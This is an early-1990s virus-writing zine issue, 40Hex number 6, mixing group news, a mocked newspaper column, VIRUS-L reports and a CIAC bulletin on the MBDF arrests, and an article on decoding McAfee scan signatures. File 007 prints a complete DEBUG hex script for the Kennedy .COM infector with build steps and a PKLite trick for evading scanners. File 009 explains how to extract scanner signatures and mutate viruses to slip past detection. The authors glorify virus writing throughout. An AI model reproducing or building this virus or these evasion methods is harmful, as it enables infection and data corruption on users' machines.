40Hex Number 6 Volume 2 Issue 2
40Hex Number 6 Volume 2 Issue 2 File 005
I'm back, well kind of. Anyways, a lot of people have been
asking, "What's going on with the group?" The question should be, "What's going
on with any group these days?" It seems to me that 1992 was the death of h/p,
or at least the "ice age" of it. Everybody was either getting busted or
quitting the scene. Oh well, what can I say about it. Our group has been
having bad luck too. Five (now six) busted as well as other assorted bad
things happening to members.
Anyways, what's going on with us, huh?. Well the reason you
haven't heard much from us is because we haven't been releasing our new stuff
to BBS systems ( BBS system sounds as redundant as PIN number, I know) because
we have a strong feeling that members of such groups as the CVIA are logging on
to h/p boards in the hope of snatching the latest viruses. Well not much you
can do about it if you run a BBS, unless you personnally know everyone who calls
your board. But come to think of it - what good does it prove to release your
newest creation to the general public (of the h/p crowd) via BBS system? Isn't
that the same principle as the warez puppy scene? I guess you all can do
whatever turns you on but we kind of decided that it would be in our best
interests to release our stuff to BBS's only after they have been detected by
the popular scanners or until they are kind of old. Not to fear, 40-HEX and
"Dark Angel Phunky Writing Guide" will still be on boards at the same rate as
always.
As for all of you people bitching that no longer have sites
and that we are dead, well your dead - wrong. The current sites are as follows
(in no specific order) - Digital Warfare (yes it's back, at a new number
however), Time Lords BBS (The U.S.S.R System), The Phunline (yes it's back),
and the newest addition - Crow Technology. And as for us being dead yeah
right.
** Note from DecimatoR:
The U.S.S.R System recently went down, due to Time Lord getting into a little
hot water. It WILL return however... we're just not sure when. **
** Note from GHeap:
I am coming back, gimme mo' time!
So now with that out of the way, on the other news. Hmmm.....
Michelangelo caused quite a scare there for a while. It was pretty cool
to see John, Patti, and the rest of the crew on T.V... John Dvorak has a new
half hour computer talk show on syndicated radio. I'm sure he wouldn't mind if
we got on the show some time soon. Check your local radio guide for your local
station and time... I am offering a standing bounty of $1,500 for the person
willing to fly to Ohio and kick Crow Meisters ass for good. A minor would be
preferred, being that he is under 18 and if I smashed him I could get sued or
something. Just kidding, Crow Meister is cool with me, hihihihi... A new
federal law is being considered which if passed will outlaw the authorship of
computer viruses totally, research or not. Read more about that later in this
issue... Hey, I might have a BBS up soon! I have been saying that for the past
2 years haven't I? Well that's the news as I see it, it's nice to be writing
for this rag again.
Check ya in 25 to life....
Hellraiser P/S
1992
This article was typed by Time Lord for HR cuz he is WAY too lazy to send me
a disk in place of a fuckin print out...
40Hex Number 6 Volume 2 Issue 2 File 006
Well, this little news "tid-bit" came from Attitude Adjuster, one of the
few non-PHALCON/SKISM contributers (ok, the ONLY non P/S member), Thanks a
lot dude, keep the submissions coming. The article itself is quite sad,
and makes me question the intelligence of our opposition.
-)GHeap&Demo
Thanx to CZ for THE line.
-------------------------------------------------------------------------------
- We need Computer Virus Snitches -
Written By Mike Royko, Tribune Media Services.
Retyped by The Attitude Adjuster
============================================================================
Millions of computer users are wondering how to protect themselves
against the wave of viruses that are threatening their machines. I have a
suggestion.[So do I, avoid Bnu 1.90Beta]
First, they should remember that these viruses don't spring from
nature. They are little computer programs that are created and sent on
their way by people that are brainy, malicious and arrogant.[I am not
brainy]
So, the question is, how do you find the creators of computer
virus programs?
Because they are arrogant, it's likely that they want someone to
know what a clever thing they have done. They won't hold a press conference
[Actually, we do hold press conferences. See Michael Alexander@Computerworld]
but chances are they will brag to a trusted friend or acquaintance or
fellow hacker.
It is sad, but the world is full of snitches.[Get a thesaurus] Look
at John Gotti, the nation's biggest Mafia boss. There was a time when it
was unthinkable for even the lowest-level Mafia soldier to blab. But now
Gotti has to sit in court while his former right-hand man tells about how
they got people whacked. [We whack people too]
So if Mafia figures can be persuaded to tattle[Na-na-na-na-na], is
there any reason to believe that nerds have a greater sense of honor and
loyalty? [Yes, we also have brains]
Of course[.] not, but how do you get them to do it?
Money. [Now yer talking... my mom is really the Dark Avenger, I want
my money now.]
These companies [what companies, I only hit hospitals] could use
petty cash to place ads in the computer magazines and on the electronic
bulletin boards. [Ok, call my BBS and post this tidbit. 40Hex now has ad
space available]
The ads would say something like: "A $50,000 reward for any
information leading to the arrest and conviction of virus authors."
[How can you convict a virus author. It isn't illegal. Go play Tank Wars.]
The next question would be what to do with the virus makers once
they have been caught. And that's the key to putting an end to the
problem: something that could be posted on those electronic bulletin
boards that might cause an aspiring virus-maker to go take a brisk walk
instead.
A judge would sit and listen to an attorney who would say some-
thing like this:
"Your honor, what we have here is an otherwise fine young man
from a good family. His father is a brilliant scholar, and the son will
someday be the same."[I am going to be a certified scholar when I grow up.]
"What he did was no more than an intellectual prank, a cerebral
challenge of sorts. Like the man who climbed Mount Everest because it was
there, he created the virus and sent it fourth because it was there."
Then, we can hope, the judge might say something like this:
"Yes, I am impressed by the defendant's brain power. And I
expected you to ask me to give him a slap on the wrist."
"However, he is not a child. He is an adult. And I would think
that so brilliant a grown man would know better than to amuse himself
by screwing with the lives of strangers." [I haven't screwed one stranger]
"It's as if he hid inside the businesses and institutions until
they were closed and everyone had gone home. Then he came out and went
through every filing cabinet and drawer and shredded or burned every bit
of useful information he could find."[Cool! Lets try it.]
"Now, counselor, what would you and your law partners say is some
street mope [See Thesaurus] did that to your firm - crept in and destroyed
every document in your offices? Including the names of clients that owe you
money. Hah, you would be in here asking me to hang him from a tree."[I love
hanging from trees]
"So don't give me that smart kid from a good family routine.
[I ain't smart, and family ain't good] He is a self-centered, insensitive,
uncaring, arrogant goofball [And damn proud]. He didn't give a second
thought to the chaos or heartbreak he would cause an adoption agency, a
hardworking businessman or a medical clinic." [Yes I did. I aim for them.]
"Therefore, I sentence him to the maximum sentence the law allows
in the local jailhouse [0, NUL, ZIP-o, /dev/null, etc..], which is a really
terrible place, filled with all sorts of crude, insensitive hulks."
[Jay-walkers]
"Bailiff, please get the defendent up off the floor and administer
some smelling salts."[More like, why is the defendant laughing?]
"And change his trousers, quickly."[Fuck you]
[]comments added by Demogorgon and GHeap
============================================================================
I hope you enjoyed that one as much as I did! Okay, I
see some really neat things with this man's article. First off,
I'm sure he's an adept programmer... that is, he can probably
figure out how to get his VCR to tape something while he is
off writing his brilliant articles. I enjoy his narrow-minded
definition of virii (that was mentioned in 40Hex 5), of course,
all virii are those evil overwriting, trigger date, resident,
boot track infecting swine (yeah, he probably learned what a
virus was from watching ABC News covering the Michaelangelo
crisis!)
I also enjoy his opinion that all virus authors are
nerds. First off, what the hell is a nerd? I mean, I have
written a virus before (not saying it was any good), but, I
don't feel like a nerd! In fact, I feel quite superior to
most of the idiots like this guy. And, I like his great
statement about my loyalty. Yes, I'm gonna narc on [PHALCON/
[Forget this again, and die]]SKISM for $50,000!!! Yeah, right.
There are a lot of narcs on this not-so good earth, so choose
your friends wisely.
I'm quite sure that ads on BBS's (electronic bulletin
boards! No... cork ones!) would just sufficiently pump up user
discussion of virii. I'm not scared of fed intervention, and
I doubt any authors I know are either.
This was touched on in 40Hex 5, virus authors are not
responsible for the spread of their virii unless they are
actively spreading them! I mean, it's not my fault that K-Rad
Man sent my Hard Drive Blender (slices, dices, minces sectors)
to 1000 Bible boards in Utah. Apparently it hasn't dawned on
this guy that most virii are not written to be destructive.
Actually, that's a lie. There are a lot of virii out there that
are descructive, but that is changing. People like the
PHALCON/SKISM crew realize that not everything must be
destructive, opening the doors to much larger virus projects
(ie Bobisms)
One more thing... QUIT EQUATING THE WORD 'hacker' TO
EVERY DAMN TYPE OF ELECTRONIC 'crime!!!'
I'm gonna get this dude's phone #, I say we call him
sometime...
-The Attitude Adjuster-
40Hex Number 6 Volume 2 Issue 2 File 007
Lets see what good ole' Patty has to say about this:
Virus Name: Kennedy
Aliases: Dead Kennedy, 333, Kennedy-333
Scan ID: [Kennedy]
V Status: Endangered
Discovered: April, 1990
Symptoms: .COM growth; message on trigger dates (see text);
crosslinking of files; lost clusters; FAT corruption
Origin: Denmark
Eff Length: 333 Bytes
Type Code: PNCKF - Parasitic Non-Resident .COM Infector
Detection Method: ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+,
NAV, IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+,
Novi 1.0.1+, Sweep 2.3.1+, UTScan
Removal Instructions: F-Prot, VirHunt 2.0+, or delete infected files
General Comments:
The Kennedy virus was isolated in April 1990. It is a generic
infector of .COM files, including COMMAND.COM.
This virus has three activation dates: June 6 (assassination of
Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969),
and November 22 (assassination of John F. Kennedy 1963) of any year.
On activation, the virus will display a message the following
message:
"Kennedy is dead - long live 'The Dead Kennedys'"
The following text strings can be found in the viral code:
"\command.com"
"The Dead Kennedys"
Systems infected with the Kennedy virus will experience
cross-linking of files, lost clusters, and file allocation table
errors (including messages that the file allocation table is bad).
--------------------------------Cut Here------------------------------------
n kennedy.com
e 0100 E9 0C 00 90 90 90 CD 20 4B 65 6E 6E 65 64 79 E8
e 0110 00 00 5E 81 EE 0F 01 8B AC 0B 02 B4 2A CD 21 81
e 0120 FA 06 06 74 28 81 FA 12 0B 74 22 81 FA 16 0B 74
e 0130 1C 8D 94 0D 02 33 C9 B4 4E CD 21 72 09 E8 17 00
e 0140 72 04 B4 4F EB F3 8B C5 05 03 01 FF E0 8D 94 20
e 0150 02 B4 09 CD 21 EB EF B8 00 43 BA 9E 00 CD 21 89
e 0160 8C 55 02 B8 01 43 33 C9 CD 21 B8 02 3D CD 21 8B
e 0170 D8 B4 3F 8D 94 52 02 8B FA B9 03 00 CD 21 80 3D
e 0180 E9 74 05 E8 7E 00 F8 C3 8B 55 01 89 94 0B 02 33
e 0190 C9 B8 00 42 CD 21 8B D7 B9 02 00 B4 3F CD 21 81
e 01A0 3D 65 64 74 DE 33 D2 33 C9 B8 02 42 CD 21 83 FA
e 01B0 00 75 D0 3D E8 FD 73 CB 05 04 00 89 84 5B 02 B8
e 01C0 00 57 CD 21 89 8C 57 02 89 94 59 02 B4 40 8D 94
e 01D0 05 01 B9 4D 01 CD 21 72 15 B8 00 42 33 C9 BA 01
e 01E0 00 CD 21 B4 40 8D 94 5B 02 B9 02 00 CD 21 8B 8C
e 01F0 57 02 8B 94 59 02 B8 01 57 CD 21 B4 3E CD 21 E8
e 0200 02 00 F9 C3 B8 01 43 8B 8C 55 02 CD 21 C3 03 00
e 0210 2A 2E 43 4F 4D 00 5C 43 4F 4D 4D 41 4E 44 2E 43
e 0220 4F 4D 00 4B 65 6E 6E 65 64 79 20 65 72 20 64 9B
e 0230 64 20 2D 20 6C 91 6E 67 65 20 6C 65 76 65 20 22
e 0240 54 68 65 20 44 65 61 64 20 4B 65 6E 6E 65 64 79
e 0250 73 22 0D 0A 24 00 00 00 00 00 00 00 00 00 00 00
e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
rcx
027F
w
q
---------------------------------Cut Here-----------------------------------
Ok there it is. Not the most impressive virus around and its caught by just
about every scan on the market, but take PKLite to it and then remove the PKLite
header (Use NOLITE in this issue) and no one will be able to find it. Anyway it
gets the job done.
To make the above hex into a working file, first cut on the dotted lines.
Name the resulting file KENNEDY.TXT.
Then: DEBUG < KENNEDY.TXT and you'll have a working virus.
-Instigator
40Hex Number 6 Volume 2 Issue 2 File 008
Take a look at this. I picked it up on fidonet, originally from Virus-L
digest. all the stuff in *< >*'s are my comments.
- Demogorgon
------------------------------
VIRUS-L Digest Wednesday, 26 Feb 1992 Volume 5 : Issue 44
------------------------------
Date: Tue, 25 Feb 92 10:10:14 -0500
>From: mha@baka.ithaca.ny.us (Mark Anbinder)
Subject: MBDF Suspects Arrested (Mac)
The Cornell Daily Sun reported in this morning's issue that two
Cornell University sophomores, David Blumenthal and Mark Pilgrim, were
arrested Monday evening and arraigned in Ithaca City Court on one
count each of second degree computer tampering, in connection with the
release of the MBDF virus that infected Macs worldwide over the last
several days. The two are being held in Tompkins County Jail.
*< huh? How does one get arrested for spreading a virus, you ask? read on >*
Further charges are pending.
---
** many lines of mail routing crap have been deleted **
Date: Tue, 25 Feb 1992 11:47:32 PST
>From: lipa@camis.stanford.edu (Bill Lipa)
Subject: Alleged MBDF virus-creators arrested at Cornell
"Computer Virus Traced to Cornell Students"
by Jeff Carmona
[The Cornell Daily Sun, 25 February 1992]
Two Cornell students were arrested yesterday for allegedly creating and
launching *< launching ? Bon voyage, we launched you !>* a computer virus that
crippled computers around the world, according to M. Stuart Lynn, the
University's vice president for information technologies.
David Blumenthal '94 and Mark Pilgrim '94 were arrested by Department of
Public Safety officers and arraigned in Ithaca City Court on one count of
second-degree computer tampering, a misdemeanor, *< cool, its only a
misdemeanor, how bad could it be ? >* Lynn said.
Both students were remanded to the Tompkins County Jail and remained in
custody early this morning. They are being held on $2,000 cash or $10,000
bail bond, officials said.
Cornell received national attention in Nov. 1988 when Robert T. Morris
Jr., a former graduate student, was accused of unleashing a computer virus
into thousands of government and university computers.
Morris, convicted under the 1986 Computer Fraud and Abuse Act, was fined
$10,000, given a three-year probation and ordered to do 400 hours of community
service by a federal judge in Syracuse, according to Linda Grace-Kobas,
*< Whats a Koba?? >* director of the Cornell News Service.
Lynn would not compare the severity of the current case with Morris',
saying that "each case is different."
Lynn said the virus, called "MBDFA" was put into three Macintosh games --
Obnoxious Tetris, Tetriscycle and Ten Tile Puzzle.
On Feb. 14, the games were launched from Cornell to a public archive at
Stanford University in Palo Alto, Calif, Lynn said.
*< I guess these guys actually put it up on the archive under their own >*
*< accounts! Don't they know they can trace that stuff? duhhh... >*
From there, the virus spread to computers in Osaka, Japan and elsewhere around
the world *< the archive was a dumb idea if thats how they got caught, but it
spread like hell >* when users connected to computer networks via modems, he
added. It is not known how many computers the virus has affected worldwide, he
explained.
When computer users downloaded the infected games, the virus caused "a
modification of system software," *< oooh...lets not get too technical >* Lynn
said. "This resulted in unusual behavior and system crashes," he added.
Lynn said he was not aware of anyone at Cornell who reported finding the
virus on their computers.
The virus was traced to Cornell last Friday, authorities were quickly
notified and an investigation began, Lynn said.
"We absolutely deplore this kind of bahavior," Lynn said. "We will pursue
this matter to the fullest."
Armed with search warrants, Public Safety investigators removed more than
a dozen crates full of evidence from the students' residences in Baker and
Founders halls on West Campus. *< sounds like a typical, over-kill bust to
me. If you don't know what it is, take it. >*
Public Safety officials refused to disclose the contents of the crates or
issue any comment about the incident when contacted repeatedly by phone last
night. *< thats because they don't know what the fuck the stuff is >*
"We believe this was dealt with very quickly and professionally," Lynn
said.
The suspects are scheduled to appear in Ithaca City Court at 1 p.m. today
and additional charges are pending, according to Grace-Kobas.
Because spreading a computer virus violates federal laws, "conceivably,
the FBI could be involved," she added. Officials with the FBI could not be
reached to confirm or deny this.
Blumenthal and Pilgrim, both 19-year-olds, were current student employees
at Cornell Information Technologies (CIT), Lynn said. He would not say
whether the students launched the virus from their residence hall rooms or
From a CIT office.
Henrik N. Dullea '61, vice president for University relations, said he
thinks "the act will immediately be associated with the University," not
only with the individual students charged.
Because a major virus originated from a Cornell student in the past, this
latest incident may again "bring a negative reaction to the entire
institution," Dullea said. *< "blah, blah, blah" >*
"These are very selfish acts," Lynn said, referring to the intentional
distribution of computer viruses, because innocent people are harmed.
Lynn said he was unaware of the students' motive for initiating the virus.
Lynn said CIT put out a notice yesterday to inform computer users about the
"very virulent" virus. A virus-protection program, such as the new version of
Disinfectant, can usually cure computers, but it may be necessary to "rebuild
the hard drive" *< egad! Not the dreaded "virus-that-makes-you-rebuild-your-
hard-drive" !>* in some cases, he added.
A former roommate of Blumenthal said he was not surprised by news of the
arrest. Computers were "more than a hobby" for Blumenthal, said Glen Fuller
'95, his roommate from last semester. "He was in front of the computer all
day," Fuller said.
Blumenthal, who had a modem, would "play around with viruses because they
were a challenge to him," Fuller said. He said that, to his knowledge,
Blumenthal had never released a virus before.
-->-<------ Cut Here --------------------------
------------------------------
VIRUS-L Digest Friday, 28 Feb 1992 Volume 5 : Issue 46
------------------------------
Date: Wed, 26 Feb 92 11:08:45 -0800
>From: karyn@cheetah.llnl.gov (Karyn Pichnarczyk)
Subject: CIAC Bulletin C-17: MBDF A on Macintosh (Mac)
NO RESTRICTIONS
_____________________________________________________
The Computer Incident Advisory Capability
___ __ __ _ ___
/ | / \ /
\___ __|__ /___\ \___
_____________________________________________________
INFORMATION BULLETIN
New Virus on Macintosh Computers: MBDF A
February 25, 1992, 1130 PST Number C-17
________________________________________________________________________
NAME: MBDF A virus
PLATFORM: Macintosh computers-except MacPlus and SE (see below)
DAMAGE: May cause program crashes
SYMPTOMS: Claris applications indicate they have been altered; some
shareware may not work, unexplained system crashes
DETECTION &
ERADICATION: Disinfectant 2.6,Gatekeeper 1.2.4, Virex 3.6,
VirusDetective 5.0.2, Rival 1.1.10, SAM 3.0
________________________________________________________________________
Critical Facts about MBDF A
A new Macintosh virus, MBDF A, (named for the resource it exploits)
has been discovered. This virus does not appear to maliciously cause
damage, but simply copies itself from one application to another.
MBDF A was discovered at two archive sites in newly posted game
applications, and has a high potential to be very widespread.
Infection Mechanism
This virus is an "implied loader" virus, and it works in a similar
manner to other implied loader viruses such as CDEF and MDEF. Once
the virus is active, clean appliacation programs will become infected
as soon as they are executed. MBDF A infects only applications, and
does not affect data files. This virus replicates under both System 6
and System 7. While MBDF A may be present on ALL types of Macintosh
systems, it will not spread if the infected system is a MacPlus or a
Mac SE (although it does spread on an SE/30).
Potential Damage
The MBDF A virus has no malicious damaging characteristics, however,
it may cause programs to inexplicably crash when an item is selected
from the menu bar. Some programs, such as the shareware
"BeHierarchic" program, have been reported to not operate correctly
when infected. Applications written with self-checking code, such as
those written by the Claris corporation, will inform the user that
they have been altered.
When MBDF A infects the system file, it must re-write the entire
system file back to disk; this process may take two or three minutes.
If the user assumes the system has hung, and reboots the Macintosh
while this is occuring, the entire system file will be corrupted and
an entire reload of system software must then be performed.
This virus can be safely eradicated from most infected programs,
although CIAC recommends that you restore all infected files from an
uninfected backup.
Detection and Eradication
Because MBDF A has been recently discovered, only anti-viral packages
updated since February 20, 1992 will locate and eradicate this virus.
All the major Macintosh anti-viral product vendors are aware of this
virus and have scheduled updates for their products. These updates
have all been available since February 24, 1992. The updated versions
of some products are Disinfectant 2.6, Gatekeeper 1.2.4, Virex 3.6,
SAM 3.0, VirusDetective 5.0.2, and Rival 1.1.10. Some Macintosh
applications (such as the Claris software mentioned above) may contain
self-verification procedures to ensure the program is valid before
each execution; these programs will note unexpected alterations to
their code and will inform the user.
MBDF A has been positively identified as present in two shareware
games distributed by reliable archive sites: "Obnoxious Tetris" and
"Ten Tile Puzzle". The program "Tetricycle" (sometimes named
"Tetris-rotating") is a Trojan Horse program which installs the virus.
If you have downloaded these or any other software since February 14,
1992 (the day these programs were loaded to the archive sites), CIAC
recommends that you acquire an updated version of an anti-viral
product and scan your system for the existence of MBDF A.
For additional information or assistance, please contact CIAC:
Karyn Pichnarczyk
(510) 422-1779 or (FTS) 532-1779
karyn@cheetah.llnl.gov
Call CIAC at (510)422-8193/(FTS)532-8193.
Send e-mail to ciac@llnl.gov
PLEASE NOTE: Many users outside of the DOE and ESnet computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report
incidents. Some of the other teams include the NASA NSI response
team, DARPA's CERT/CC, NAVCIRT, and the Air Force response team. Your
agency's team will coordinate with CIAC.
CIAC would like to thank Gene Spafford and John Norstad, who provided
some of the information used in this bulletin. This document was
prepared as an account of work sponsored by an agency of the United
States Government. Neither the United States Government nor the
University of California nor any of their employees, makes any
warranty, express or implied, or assumes any legal liability or
responsibility for the accuracy, completeness, or usefulness of any
information, apparatus, product, or process disclosed, or represents
that its use would not infringe privately owned rights. Reference
herein to any specific commercial products, process, or service by
trade name, trademark, manufacturer, or otherwise, does not
necessarily constitute or imply its endorsement, recommendation or
favoring by the United States Government or the University of
California. The views and opinions of authors expressed herein do not
necessarily state or reflect those of the United States Government or
the University of California, and shall not be used for advertising or
product endorsement purposes.
-->-<----- Cut Here -------------------------
---
------------------------------
VIRUS-L Digest Friday, 28 Feb 1992 Volume 5 : Issue 46
------------------------------
Date: Wed, 26 Feb 92 15:32:02 -0500
>From: mha@baka.ithaca.ny.us (Mark Anbinder)
Subject: Cornell MBDF Press Release (Mac)
_____________________________________________________
PRESS RELEASE ISSUED BY CORNELL NEWS SERVICE 2/25/91
Students charged
with releasing
computer virus
By Linda Grace-Kobas
Following a university investigation that tracked a computer virus and
its originators, two Cornell students were arrested and charged with
computer tampering for allegedly launching a computer virus embedded in
three games into national computer archives. Arraigned Feb. 24 in
Ithaca City Court were David S. Blumenthal, 19, a sophomore in the
College of Engineering, and Mark Andrew Pilgrim, 19, a sophomore in the
College of Arts and Sciences. They were charged with computer tampering
in the second degree, a Class A misdemeanor. The pair is being held in
Tompkins County Jail with bail set at $2,000 cash bond or $10,000
property bond. At a hearing Tuesday afternoon, Judge Sherman returned
the two to jail with the same bond and recommended that they remain in
jail until at least Friday pending the federal investigation. A
preliminary hearing is set for April 10.
Both students were employed by Cornell Information Technologies, which
runs the university's computer facilities. Pilgrim worked as a student
operator in an Apple Macintosh facility from which the virus is believed
to have been launched. The university's Department of Public Safety is
working with the Tompkins County district attorney's office, and
additional charges are expected to be filed. The Federal Bureau of
Investigation has contacted the university to look at possible violations
of federal laws, officials said. The Ithaca Police Department is also
assisting in the investigation.
"We absolutely abhor this type of behavior, which appears to violate the
university's computer abuse policy as well as applicable state and
federal law," commented M. Stuart Lynn, vice president for information
technologies, who headed the investigation to track the originators of
the virus. "Cornell will pursue all applicable remedies under our own
policies and will cooperate with law enforcement authorities."
Lynn said Cornell was alerted Feb. 21 that a Macintosh computer virus
embedded in versions of three computer games, Obnoxious Tetris,
Tetricycle and Ten Tile Puzzle, had possibly been launched through a
Cornell computer. A virus is normally embedded in a program and only
propagates to other programs on the host system, he explained.
Typically, when an infected application is run, the virus will attack the
system software and then other applications will become infected as they
are run.
The virus, MBDF-A, had been deposited on Feb. 14 directly and indirectly
into several computer archives in the U.S. and abroad, including
SUMEX-AIM at Stanford University and archives at the University of Texas,
the University of Michigan and another in Osaka, Japan. These archives
store thousands of computer programs available to users of Internet, the
worldwide computer network.
Macintosh users who downloaded the games to their computers were subject
to a variety of problems, notably the modification of system software and
application programs, resulting in unusual behavior and possible system
crashes. Apparently, there was no intent to destroy data, Lynn said, but
data could be destroyed in system crashes.
Reports of the virus have been received from across the United States and
around the world, including Wales, Britain, Lynn said, adding that he has
no estimate for the number of individuals who might have obtained the
games.
As soon as the virus was identified, individuals and groups across the
country involved with tracking viruses sent messages across computer
networks to alert users who might have been affected by the virus, Lynn
added. The virus has since been removed from all archives and
"disinfectant" software available to the Internet community has been
modified so that individual Macintosh users can purge their computers of
it.
"Our sense is that the virus was controlled very rapidly," he said. In
1988, Cornell received national attention when graduate student Robert T.
Morris Jr. launched a computer virus into important government and
university research networks. That virus, actually considered a "worm"
since it was self-perpetuating, caused major damage in high-level
systems. Morris was convicted under the 1986 Computer Fraud and Abuse
Act and fined $10,000, given three years probation and ordered to do 400
hours of community service by a federal judge in Syracuse, N.Y.
The new virus differs greatly from the Morris worm, Lynn said. "This
virus is not to be compared with the Morris worm, which independently
moved from machine to machine across the network," he explained. All
Macintosh users should take appropriate measures to be certain their
systems are not infected with the virus.
News Service science writer William Holder also contributed to
this report.
---
Mark H. Anbinder 607-257-2070 - FAX 607-257-2657
BAKA Computers, Inc. QuickMail QM-QM 607-257-2614
200 Pleasant Grove Road mha@baka.ithaca.ny.us
Ithaca, NY 14850
-->-<----- Cut Here -------------------------
40Hex Number 6 Volume 2 Issue 2 File 009
-=[ The 'McAfee scan' viral footprint codes ]=-
-or-
/*******************************************/
/* A fool and his scanner, can part a user */
/* from his hard earned money. */
/*******************************************/
- written by -
GodNet Raider
- of -
The CyberUnderground
Thrown into 40Hex by DecimatoR
from Usenet alt.security
-=[ "Information is the greatest weapon of power to the modern wizard." ]=-
]----------------------------------------------------------------------------[
Introduction:
-------------
Recently I began to wonder about the usefulness of 'virus scanners'
and what if any difference do they have with a simple text/hex search
program (like nortons filefind/ts). An if there was no real DIFFERENCE,
how secure is the system that used them.
Problems with scanning:
-----------------------
The first question I had to ask was, What does a 'virus scanner' actually
look for? Does it only look for one string of codes or several at different
places in the file?
To answer this question I called a local BBS an dl'ed McAfee's
scan3.7v64 (to evaluate and after my tests, it was erased for its lack of
offering any real protection). Then I went to my archives to retrieve some
viruses I have experimented with in the past (of which where Jerusalem B and
Dark Avenger).
I ran scan to verify that the virus files where viruses (3 of which did
not set off any alarm even tho there was a listing in the documentation for
them, so I removed them from the test). Then using a sector editor looked at
the source for the McAfee asso. scan3.7v64 (here after know just as scan64)
to find that the footprint information was encoded. Needless to say this did
not stop me (for the sake of those who are into the tech aspects of things,
the actual method used to get the codes are included at the end of the
article with the codes found), It took less than an hour to get the codes I
was looking for (without disassembling the code but by looking into the
memory allocated to the program).
What I found out was scan was just a simple hex searcher (that kept
its data locked up till needed). It could also be fooled by any program
that contained the same hex string as a real virus (this was proved when
, using a sector editor, I added the scan64 footprint for the Jerusalem B
into the top of a text file (a place this code would never show up in a real
infection) then renamed it to *.com; scan64 reported it as infected).
Once the codes where obtained, using debug directly on a virus file,
I was able to mutate the virus to no longer be detectable by scan64 without
destroying the integrity of it. For the virus was still able to infect files,
and scan64 could no longer track it. I was still able to track and control it
using norton's filefind, diskmon, diskedit, and (of course) DOS erase.
So it seems my question was answered. Some 'virus scanners' just scan
for a single string of hex character. This is fine if viruses NEVER changed
or programs would NEVER use code similar to what a virus would (the smaller
the footprint string the bigger the chance of mistaken alarms). For if
a 'virus scanner' programer just keeps making a new release each time there
is a new virus (an I will not get into the morality of charging customers
the full price of an software upgrade rather than allowing them to buy/dl
new footprint data files as they become available) for the program will
eventually grow to unwealdable sizes. An it should be noted there are other
programs that may do the same job faster, more upward compatibility, and
you may already have them on hand.
a possible solution:
--------------------
One thing that I think is a good idea is when a program allows users
to add new footprint data to it (like nortons' virus package). For now
users don't need to buy new releases for detection of viruses they may not
get/be able to detect. Instead for the cost of a call to a support bbs (part
of the original software agreement?) the user can get new data as it becomes
available or when they fine a new one on their system they can immediately
add the new footprint rather than wait for the next version to be released.
Method used to obtain footprints:
---------------------------------
After finding the data I was looking for was encoded I thought, How can
I get the data I wanted for my tests?
Disassembling was out, not for any MORAL reason but, for the time
involved. So I thought it must have to decode the data for it's own use
and to save time it would do it all before the scan rather than slow the
process down by doing a full decode. So I needed to look at the memory
image of the running program. Thanks to DOS 5.0 and dosshell I was able to
do this.
After spawning the scan task under the dos shell I used alt-tab to
swap back to the shell. Once back in the shell I used the shell commands to
copy the �tmpxxx.swp to foo.img and terminating scan64 and dosshell.
Then using a sector editor I searched though the temp file created by
the dos shell. I found an area of data that contained the virus names and
non ascii text data separating them. Even though the strings of ascii data
(virus names) ended with a zero character (as variable strings have a
tendency to), the random data did not end with a common signal character (as
expected for code can be any character). There was also no character count
stored (the data length varied so it could not be assumed by the scan
program as well). So I continued to search though the data.
I eventually found another area that had the same text strings (virus
names). This time the first character of the none ascii data gave the count
of the data size to the following text string. I knew I had found it so I
extracted this data to another file (starting at 0 offset in the new file).
Then wrote down the some codes and checked them against viruses I had.
The codes I had did not seem match. This did not stop me. I took one
virus (that my understanding said scan was only looking for 6 consecutive
bytes to match) and started zapping bytes (in a file scan said was infected)
to find what it was looking for. The processes involved zapping one sector
at a time till scan said it was not infected, then half of that sector, then
half of a half, and so on. It came down to 6 CONSECUTIVE bytes as I expected.
But they where DIFFERENT from the ones I had.
So I went to the windows calculator (it allows byte arithmetic in hex,
ie.. 0xff + 0x04 = 0x03 (rollover, carry is ignored), it would be outside
the scope of this ARTICLE to explain why I thought byte arithmetic was
important). Some quick subtraction found a 0x93 (decimal 147) DIFFERENCE
between the actual codes and the ones from the allocated memory uses by
scan.
So taking another virus that scan said was infected I did the minor
hex math on the codes in the allocated memory used by scan and found the
codes. Then i zapped only the codes and ran scan on the updated virus file.
It said there was no infection. I knew I now had the right codes (after a few
more checks).
So I created a simple C program (see below) to convert the extract file I
created and converted the codes to a readable form (output from program
listed at end of ARTICLE). Then tested other viruses against the list. An
found the same results.
Binary to hex program:
----------------------
/*
fp2txt.c
Convert footprint binary information to text.
by GodNet Raider
Notes:
Please forgive the unrefined/unannotated nature of this code it was
designed as a one shot.
*/
#include
#include
#define TRUE 1
#define MAGICNUM 0x93
void
main (void);
void main (void)
{
unsigned char
sVirusFP [128],
*ptVirusInfo,
szVirusName [128];
register unsigned int
nTmpCnt;
FILE
*Stream;
Stream = fopen ("fp2.img", "rb");
while (!feof (Stream))
{
ptVirusInfo = sVirusFP;
if (!(*sVirusFP = getc (Stream)))
exit (0);
nTmpCnt = (unsigned int) *sVirusFP;
while (nTmpCnt--)
*(++ptVirusInfo) = ((unsigned char) getc (Stream)) - MAGICNUM;
ptVirusInfo = szVirusName;
while ((*(ptVirusInfo++) = getc (Stream)));
printf ("\n%s:\n ", szVirusName);
ptVirusInfo = sVirusFP;
nTmpCnt = (unsigned int) *sVirusFP;
while (nTmpCnt--)
{
printf ("0x%02x ", (unsigned int) *(++ptVirusInfo));
if (nTmpCnt && !((*sVirusFP - nTmpCnt) % 8))
printf ("\n ");
}
printf ("\n");
getc (Stream);
}
exit (0);
}
Footprints discovered:
----------------------
The following is a list of the footprint codes found in McAfee asso.
Scan3.7v64.
1008 Virus [1008]:
0x81 0xed 0x38 0x00 0xe8 0xc3
Stoned-II Virus [S-2]:
0x9c 0x2e 0xff 0x1e 0x09 0x00
VHP-2 Virus [VHP2]:
0x1c 0x8c 0x44 0x02 0xb8 0x24 0x35 0xcd
0x21 0x89
VHP Virus [VHP]:
0x07 0x89 0x7e 0x8a 0x8d 0x7e 0x90 0x89
0x7e 0x88
Taiwan3 Virus [T3]:
0x17 0x0f 0x32 0x0a 0x32 0x0a 0x90 0x0b
0xfb 0x08
